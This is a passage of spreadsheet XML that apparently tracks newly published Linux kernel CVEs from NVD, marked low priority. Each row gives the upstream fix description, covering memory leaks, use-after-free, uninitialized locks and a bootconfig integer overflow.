      <c r="L550" s="5" t="inlineStr"/>
      <c r="M550" s="5" t="inlineStr"/>
      <c r="N550" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O550" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P550" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q550" s="5" t="inlineStr"/>
      <c r="R550" s="5" t="inlineStr"/>
      <c r="S550" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/i915: Fix memory leak in query_perf_config_list()
When krealloc() fails, free the original oa_config_ids before returning
to avoid a memory leak.
(cherry picked from commit 9977e9d84f46d4f12ad35fbbc0ec4638554bce87)</t>
        </is>
      </c>
      <c r="T550" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97899</t>
        </is>
      </c>
    </row>
    <row r="551">
      <c r="A551" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B551" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C551" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97900</t>
        </is>
      </c>
      <c r="D551" s="5" t="inlineStr"/>
      <c r="E551" s="5" t="inlineStr"/>
      <c r="F551" s="5" t="inlineStr"/>
      <c r="G551" s="5" t="inlineStr"/>
      <c r="H551" s="5" t="inlineStr"/>
      <c r="I551" s="5" t="inlineStr"/>
      <c r="J551" s="5" t="inlineStr"/>
      <c r="K551" s="5" t="inlineStr"/>
      <c r="L551" s="5" t="inlineStr"/>
      <c r="M551" s="5" t="inlineStr"/>
      <c r="N551" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O551" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P551" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q551" s="5" t="inlineStr"/>
      <c r="R551" s="5" t="inlineStr"/>
      <c r="S551" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/drm_exec: fix up contended obj when num_objects is 0
drm_exec_prepare_array() silently returns success without calling
drm_exec_lock_contended() when num_objects is zero. This breaks the
invariant upheld by drm_exec_lock_obj(), where every entry point into
the locking sequence must first attempt to lock any previously
contended object before proceeding.
Drivers that chain multiple drm_exec_prepare_array() calls per
drm_exec_until_all_locked() iteration (e.g. amdgpu's userq signal/wait
ioctls, which prepare separate read and write BO arrays) can pass an
empty array for one of the two calls. If contention is hit while
preparing the non-empty array, exec-&gt;contended is set and the loop
retries; on retry, the empty-array call preceding it is a no-op that
never clears exec-&gt;contended, so drm_exec_retry_on_contention()
immediately jumps back to the top of the loop without ever reaching
the call that would resolve the contention. This spins forever.
Fix it by having drm_exec_prepare_array() call drm_exec_lock_contended()
directly when num_objects is zero, so a pending contended object dont
loop infinitely.</t>
        </is>
      </c>
      <c r="T551" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97900</t>
        </is>
      </c>
    </row>
    <row r="552">
      <c r="A552" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B552" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C552" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97901</t>
        </is>
      </c>
      <c r="D552" s="5" t="inlineStr"/>
      <c r="E552" s="5" t="inlineStr"/>
      <c r="F552" s="5" t="inlineStr"/>
      <c r="G552" s="5" t="inlineStr"/>
      <c r="H552" s="5" t="inlineStr"/>
      <c r="I552" s="5" t="inlineStr"/>
      <c r="J552" s="5" t="inlineStr"/>
      <c r="K552" s="5" t="inlineStr"/>
      <c r="L552" s="5" t="inlineStr"/>
      <c r="M552" s="5" t="inlineStr"/>
      <c r="N552" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O552" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P552" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q552" s="5" t="inlineStr"/>
      <c r="R552" s="5" t="inlineStr"/>
      <c r="S552" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
genetlink: pin family module during policy dump
The generic netlink controller's policy dump keeps pointers to the target
family's operation and policy tables in its callback state.  A dump may be
split across multiple skbs and remain pending after the initial request.
Netlink pins the module which owns the dump callback, but in this case
that is the controller's owner rather than the target family's owner.  The
target family can consequently be unregistered and its module unloaded
while a policy dump is pending.  Advancing the dump then dereferences
policy memory from the unloaded module.
Take a reference to the target family's module when the dump starts.
Drop it from the error and done paths.  This matches the lifetime for which
the dump context retains the family and policy pointers.</t>
        </is>
      </c>
      <c r="T552" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97901</t>
        </is>
      </c>
    </row>
    <row r="553">
      <c r="A553" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B553" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C553" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97902</t>
        </is>
      </c>
      <c r="D553" s="5" t="inlineStr"/>
      <c r="E553" s="5" t="inlineStr"/>
      <c r="F553" s="5" t="inlineStr"/>
      <c r="G553" s="5" t="inlineStr"/>
      <c r="H553" s="5" t="inlineStr"/>
      <c r="I553" s="5" t="inlineStr"/>
      <c r="J553" s="5" t="inlineStr">
        <is>
          <t>aws, gin</t>
        </is>
      </c>
      <c r="K553" s="5" t="inlineStr"/>
      <c r="L553" s="5" t="inlineStr"/>
      <c r="M553" s="5" t="inlineStr"/>
      <c r="N553" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O553" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P553" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q553" s="5" t="inlineStr"/>
      <c r="R553" s="5" t="inlineStr"/>
      <c r="S553" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs: don't return -EINVAL for successful nested thaw
Commit 7366f8b6fc6a ("fs: handle freezing from multiple devices")
replaced the freeze_holders bitmask with per-holder counters to allow
nested freezes. In the bitmask version, a thaw that released a shared
hold while another holder remained returned 0. Since the rework,
thaw_super_locked() drops the freeze reference via freeze_dec() but
then returns -EINVAL when other freezers remain, misinforming the
caller: the thaw did succeed, the superblock just stays frozen for the
remaining holders.
This breaks bdev-initiated freezing. When a filesystem is frozen with
FIFREEZE and additionally frozen via bdev_freeze() -- which nests by
design, see fs_bdev_freeze() -- the subsequent bdev_thaw() receives
-EINVAL from the holder op although its freeze reference was dropped,
and therefore keeps bd_fsfreeze_count elevated. Then device-mapper's
unlock_fs() ignores bdev_thaw()'s return value, so nothing rebalances
the count. After the user's FITHAW and umount, the block device can
never be mounted again:
    dm-1: Can't mount, blockdev is frozen
There is no way for userspace to drop the leaked count; only
destroying the block device (or a reboot) recovers the device.
Reproducer (any kernel since v6.8):
    dmsetup create dut --table "0 $(blockdev --getsz "$DEV") linear $DEV 0"
    mkfs.ext4 /dev/mapper/dut
    mount /dev/mapper/dut /mnt
    fsfreeze --freeze /mnt      # freeze_ucount == 1
    dmsetup suspend dut         # bd_fsfreeze_count == 1, ucount == 2
    dmsetup resume dut          # ucount 2 -&gt; 1, but thaw_super()
                                # returns -EINVAL, so bdev_thaw()
                                # keeps bd_fsfreeze_count at 1
    fsfreeze --unfreeze /mnt    # filesystem thaws fine
    umount /mnt
    mount /dev/mapper/dut /mnt  # EBUSY, forever
The same happens with fsfreeze held across an LVM snapshot of the
origin volume.
fs_bdev_thaw()'s documentation already describes the intended
semantics: "If this function returns zero it doesn't mean that the
filesystem is unfrozen as it may have been frozen multiple times".
Restore them by returning 0 when a nested thaw drops its hold while
other freezers remain. Thawing without holding a freeze still fails
with -EINVAL as may_unfreeze() rejects that case before the reference
count is touched.</t>
        </is>
      </c>
      <c r="T553" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97902</t>
        </is>
      </c>
    </row>
    <row r="554">
      <c r="A554" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B554" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C554" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97904</t>
        </is>
      </c>
      <c r="D554" s="5" t="inlineStr"/>
      <c r="E554" s="5" t="inlineStr"/>
      <c r="F554" s="5" t="inlineStr"/>
      <c r="G554" s="5" t="inlineStr"/>
      <c r="H554" s="5" t="inlineStr"/>
      <c r="I554" s="5" t="inlineStr"/>
      <c r="J554" s="5" t="inlineStr"/>
      <c r="K554" s="5" t="inlineStr"/>
      <c r="L554" s="5" t="inlineStr"/>
      <c r="M554" s="5" t="inlineStr"/>
      <c r="N554" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O554" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P554" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q554" s="5" t="inlineStr"/>
      <c r="R554" s="5" t="inlineStr"/>
      <c r="S554" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: initialize policy rwsem before sysfs publication
cpufreq_policy_alloc() initializes policy-&gt;rwsem after
kobject_init_and_add() has created the policy sysfs directory and its
default attributes. A sysfs access can therefore reach a policy callback
before the semaphore has been initialized.
Initialize policy-&gt;rwsem before publishing the policy kobject so sysfs
callbacks always see an initialized semaphore.</t>
        </is>
      </c>
      <c r="T554" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97904</t>
        </is>
      </c>
    </row>
    <row r="555">
      <c r="A555" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B555" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C555" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97905</t>
        </is>
      </c>
      <c r="D555" s="5" t="inlineStr"/>
      <c r="E555" s="5" t="inlineStr"/>
      <c r="F555" s="5" t="inlineStr"/>
      <c r="G555" s="5" t="inlineStr"/>
      <c r="H555" s="5" t="inlineStr"/>
      <c r="I555" s="5" t="inlineStr"/>
      <c r="J555" s="5" t="inlineStr"/>
      <c r="K555" s="5" t="inlineStr"/>
      <c r="L555" s="5" t="inlineStr"/>
      <c r="M555" s="5" t="inlineStr"/>
      <c r="N555" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O555" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P555" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q555" s="5" t="inlineStr"/>
      <c r="R555" s="5" t="inlineStr"/>
      <c r="S555" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: zero-initialize policy cpumask before sysfs publication
cpufreq_policy_alloc() allocates policy-&gt;cpus with alloc_cpumask_var(),
i.e. without __GFP_ZERO, unlike the sibling related_cpus and real_cpus
masks. With CONFIG_CPUMASK_OFFSTACK=y the mask is a separate
kmalloc_node() allocation, so its bitmap holds whatever the slab allocator
left behind:
  cpufreq_online()
    cpufreq_policy_alloc()
      alloc_cpumask_var(&amp;policy-&gt;cpus)    /* bitmap is uninitialized */
      kobject_init_and_add()              /* policy%u/ appears in sysfs */
    cpufreq_policy_online()
      cpumask_copy(policy-&gt;cpus, cpumask_of(cpu))  /* first valid value */
This leaves a window in which the sysfs attributes are already reachable
while policy-&gt;cpus is still garbage. show()/store() gate on
policy_is_inactive(), i.e. cpumask_empty(policy-&gt;cpus), so a non-zero
bitmap makes them run the attribute callbacks on a policy that is not
initialized yet.
Fix this by using zalloc_cpumask_var() for policy-&gt;cpus.</t>
        </is>
      </c>
      <c r="T555" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97905</t>
        </is>
      </c>
    </row>
    <row r="556">
      <c r="A556" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B556" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C556" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97906</t>
        </is>
      </c>
      <c r="D556" s="5" t="inlineStr"/>
      <c r="E556" s="5" t="inlineStr"/>
      <c r="F556" s="5" t="inlineStr"/>
      <c r="G556" s="5" t="inlineStr"/>
      <c r="H556" s="5" t="inlineStr"/>
      <c r="I556" s="5" t="inlineStr"/>
      <c r="J556" s="5" t="inlineStr"/>
      <c r="K556" s="5" t="inlineStr"/>
      <c r="L556" s="5" t="inlineStr"/>
      <c r="M556" s="5" t="inlineStr"/>
      <c r="N556" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O556" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P556" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q556" s="5" t="inlineStr"/>
      <c r="R556" s="5" t="inlineStr"/>
      <c r="S556" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bootconfig: Fix integer overflow in initrd size check
Sashiko reported that in get_boot_config_from_initrd(), a crafted initrd
with a huge bootconfig size (such as 0xFFFFFFFF) can cause the pointer
arithmetic:
    data = ((void *)hdr) - size;
to wrap around on 32-bit systems (or when pointer subtraction overflows).
Because data wraps around, the subsequent bounds check:
    if ((unsigned long)data &lt; initrd_start)
evaluates to false, bypassing the check. The kernel then calls
xbc_calc_checksum(data, size), which attempts to read 4GB of memory,
hitting unmapped pages and triggering a fatal kernel page fault during
early boot. Furthermore, on 64-bit systems with an initrd &gt; 4.29 GB, an
unbounded 32-bit size can similarly bypass the initrd_start check.
Fix this by:
1. Ensuring the initrd is at least large enough to contain the bootconfig
   footer and verifying hdr is within the initrd bounds.
2. Checking that size does not exceed XBC_DATA_MAX and does not exceed
   the available space between initrd_start and hdr before performing
   pointer subtraction.</t>
        </is>
      </c>
      <c r="T556" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97906</t>
        </is>
      </c>
    </row>
    <row r="557">
      <c r="A557" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B557" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C557" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97907</t>
        </is>
      </c>
      <c r="D557" s="5" t="inlineStr"/>
      <c r="E557" s="5" t="inlineStr"/>
      <c r="F557" s="5" t="inlineStr"/>
      <c r="G557" s="5" t="inlineStr"/>
      <c r="H557" s="5" t="inlineStr"/>
      <c r="I557" s="5" t="inlineStr"/>
      <c r="J557" s="5" t="inlineStr"/>
      <c r="K557" s="5" t="inlineStr"/>
      <c r="L557" s="5" t="inlineStr"/>
      <c r="M557" s="5" t="inlineStr"/>
      <c r="N557" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O557" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P557" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q557" s="5" t="inlineStr"/>
      <c r="R557" s="5" t="inlineStr"/>
      <c r="S557" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btrtl: Don't leak return code when parsing firmware format v2
When key_id from chip is zero, rtlbt_parse_firmware_v2() intentionally
ignores all security headers. However, the implementation simply breaks
from a switch statement and leaks uninitialized return code `rc' (if the
first section is a security one) or the previous section's `rc'.
Fix it by really skipping a loop with `continue'. For consistency and
readability, also do the same for the default case.</t>
        </is>
      </c>
      <c r="T557" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97907</t>
        </is>
      </c>
    </row>
    <row r="558">
      <c r="A558" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B558" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C558" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97908</t>
        </is>
      </c>
      <c r="D558" s="5" t="inlineStr"/>
      <c r="E558" s="5" t="inlineStr"/>
      <c r="F558" s="5" t="inlineStr"/>
      <c r="G558" s="5" t="inlineStr"/>
      <c r="H558" s="5" t="inlineStr"/>
      <c r="I558" s="5" t="inlineStr"/>
      <c r="J558" s="5" t="inlineStr"/>
      <c r="K558" s="5" t="inlineStr"/>
      <c r="L558" s="5" t="inlineStr"/>
      <c r="M558" s="5" t="inlineStr"/>
      <c r="N558" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O558" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P558" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q558" s="5" t="inlineStr"/>
      <c r="R558" s="5" t="inlineStr"/>
      <c r="S558" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btqcomsmd: destroy RPMsg endpoints before freeing hci_dev
The command and ACL RPMsg endpoints store struct btqcomsmd as their
callback private data. The receive callbacks dereference btq-&gt;hdev
without taking an hci_dev reference.
The current teardown order frees the hci_dev before destroying the RPMsg
endpoints in both the hci_register_dev() error path and the driver remove
path. If WCNSS delivers data in that window, the endpoint callback can
run with an already freed hci_dev and pass it to the Bluetooth core.
For qcom_smd endpoints, rpmsg_destroy_ept() closes the channel and clears
the callback under the channel recv_lock. The receive path holds the same
lock while invoking the callback, so destroying the endpoints first both
prevents new callbacks and serializes with any callback already running.
Destroy the command and ACL endpoints before hci_free_dev(). Keep
hci_unregister_dev() first during remove so the HCI core stops issuing
operations before the transport endpoints are shut down. In the full
registration-error cleanup path, return directly after freeing the hci_dev
to avoid falling through to the partial-construction labels and destroying
the endpoints twice.</t>
        </is>
      </c>
      <c r="T558" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97908</t>
        </is>
      </c>
    </row>
    <row r="559">
      <c r="A559" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B559" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C559" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97909</t>
        </is>
      </c>
      <c r="D559" s="5" t="inlineStr"/>
      <c r="E559" s="5" t="inlineStr"/>
      <c r="F559" s="5" t="inlineStr"/>
      <c r="G559" s="5" t="inlineStr"/>
      <c r="H559" s="5" t="inlineStr"/>
      <c r="I559" s="5" t="inlineStr"/>
      <c r="J559" s="5" t="inlineStr"/>
      <c r="K559" s="5" t="inlineStr"/>
      <c r="L559" s="5" t="inlineStr"/>
      <c r="M559" s="5" t="inlineStr"/>
      <c r="N559" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O559" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P559" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q559" s="5" t="inlineStr"/>
      <c r="R559" s="5" t="inlineStr"/>
      <c r="S559" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ASoC: sti: initialize IRQ lock before requesting IRQ
uni_reader_init() registers the shared IRQ before initializing
reader-&gt;irq_lock. A pending interrupt can invoke the handler while the
lock is still uninitialized.
Initialize the lock before registering the IRQ so the interrupt path
always sees valid lock state.</t>
        </is>
      </c>
      <c r="T559" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97909</t>
        </is>
      </c>
    </row>
    <row r="560">
      <c r="A560" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B560" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C560" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97912</t>
        </is>
      </c>
      <c r="D560" s="5" t="inlineStr"/>
      <c r="E560" s="5" t="inlineStr"/>
      <c r="F560" s="5" t="inlineStr"/>
      <c r="G560" s="5" t="inlineStr"/>
      <c r="H560" s="5" t="inlineStr"/>
      <c r="I560" s="5" t="inlineStr"/>
      <c r="J560" s="5" t="inlineStr"/>
      <c r="K560" s="5" t="inlineStr"/>
      <c r="L560" s="5" t="inlineStr"/>
      <c r="M560" s="5" t="inlineStr"/>
      <c r="N560" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O560" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P560" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q560" s="5" t="inlineStr"/>
      <c r="R560" s="5" t="inlineStr"/>
      <c r="S560" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Ensure SRAM size is 0 on mapping failure
On a mapping failure of the SRAM, the SRAM size is left as non-zero. The
probe will succeed as the error return is not checked since having SRAM is
not a hard requirement. The non-zero size allows jobs to access SRAM which
is left pointing to physical base address 0x0.</t>
        </is>
      </c>
      <c r="T560" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97912</t>
        </is>
      </c>
    </row>
    <row r="561">
      <c r="A561" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B561" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C561" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97913</t>
        </is>
      </c>
      <c r="D561" s="5" t="inlineStr"/>
      <c r="E561" s="5" t="inlineStr"/>
      <c r="F561" s="5" t="inlineStr"/>
      <c r="G561" s="5" t="inlineStr"/>
      <c r="H561" s="5" t="inlineStr"/>
      <c r="I561" s="5" t="inlineStr"/>
      <c r="J561" s="5" t="inlineStr"/>
      <c r="K561" s="5" t="inlineStr"/>
      <c r="L561" s="5" t="inlineStr"/>
      <c r="M561" s="5" t="inlineStr"/>
      <c r="N561" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O561" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P561" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q561" s="5" t="inlineStr"/>
      <c r="R561" s="5" t="inlineStr"/>
      <c r="S561" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Ensure cmd stream ends with a stop op
While the QSIZE register setting should prevent an out of bounds access
of the command stream, it is not clear whether the h/w generates an
interrupt in this case as is required (to prevent a timeout). As a stop op
is expected end of the command stream, let's just ensure it is present. A
stop op in the middle of the command stream also makes no sense.</t>
        </is>
      </c>
      <c r="T561" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97913</t>
        </is>
      </c>
    </row>
    <row r="562">
      <c r="A562" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B562" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C562" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97914</t>
        </is>
      </c>
      <c r="D562" s="5" t="inlineStr"/>
      <c r="E562" s="5" t="inlineStr"/>
      <c r="F562" s="5" t="inlineStr"/>
      <c r="G562" s="5" t="inlineStr"/>
      <c r="H562" s="5" t="inlineStr"/>
      <c r="I562" s="5" t="inlineStr"/>
      <c r="J562" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K562" s="5" t="inlineStr"/>
      <c r="L562" s="5" t="inlineStr"/>
      <c r="M562" s="5" t="inlineStr"/>
      <c r="N562" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O562" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P562" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q562" s="5" t="inlineStr"/>
      <c r="R562" s="5" t="inlineStr"/>
      <c r="S562" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel: ethosu: Fix ethosu_job_open() return value
A WARN_ON() returns a 0 or 1, not the original negative errno. Just drop
the WARN_ON() as the FD open will pass the return code to userspace and
there's only one possible source of the error (drm_sched_entity_init()).</t>
        </is>
      </c>
      <c r="T562" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97914</t>
        </is>
      </c>
    </row>
    <row r="563">
      <c r="A563" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B563" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C563" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97915</t>
        </is>
      </c>
      <c r="D563" s="5" t="inlineStr"/>
      <c r="E563" s="5" t="inlineStr"/>
      <c r="F563" s="5" t="inlineStr"/>
      <c r="G563" s="5" t="inlineStr"/>
      <c r="H563" s="5" t="inlineStr"/>
      <c r="I563" s="5" t="inlineStr"/>
      <c r="J563" s="5" t="inlineStr"/>
      <c r="K563" s="5" t="inlineStr"/>
      <c r="L563" s="5" t="inlineStr"/>
      <c r="M563" s="5" t="inlineStr"/>
      <c r="N563" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O563" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P563" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q563" s="5" t="inlineStr"/>
      <c r="R563" s="5" t="inlineStr"/>
      <c r="S563" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/ivpu: Limit firmware log name prints to field size
The name in struct vpu_tracing_buffer_header is a fixed-size array
populated by the NPU firmware. It is expected to be NUL-terminated,
but nothing on the host side enforces this, so printing it with an
unbounded string conversion would read past the field if the
terminator is ever missing and expose adjacent bytes of the shared
tracing BO through dmesg and the debugfs FW log output.
Print at most as many characters as the name field holds, so the output
never runs past it even if the string is not NUL-terminated.</t>
        </is>
      </c>
      <c r="T563" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97915</t>
        </is>
      </c>
    </row>
    <row r="564">
      <c r="A564" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B564" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C564" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97916</t>
        </is>
      </c>
      <c r="D564" s="5" t="inlineStr"/>
      <c r="E564" s="5" t="inlineStr"/>
      <c r="F564" s="5" t="inlineStr"/>
      <c r="G564" s="5" t="inlineStr"/>
      <c r="H564" s="5" t="inlineStr"/>
      <c r="I564" s="5" t="inlineStr"/>
      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q564" s="5" t="inlineStr"/>
      <c r="R564" s="5" t="inlineStr"/>
      <c r="S564" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
accel/ivpu: Validate firmware log buffer metadata
The tracing log headers parsed by fw_log_print_buffer() reside in
DMA-shared BOs that the NPU firmware can write to.
fw_log_from_bo() validated log-&gt;header_size and log-&gt;size, but
fw_log_print_buffer() re-read those same fields from shared memory
afterwards, allowing a TOCTOU where firmware changes them between the
check and the use, and making the host dereference out-of-bounds
addresses while printing logs.
Snapshot the validated values once with READ_ONCE() and pass them down
explicitly in a new struct ivpu_fw_log_desc instead of re-reading them
from the shared struct.</t>
        </is>
      </c>
      <c r="T564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97916</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
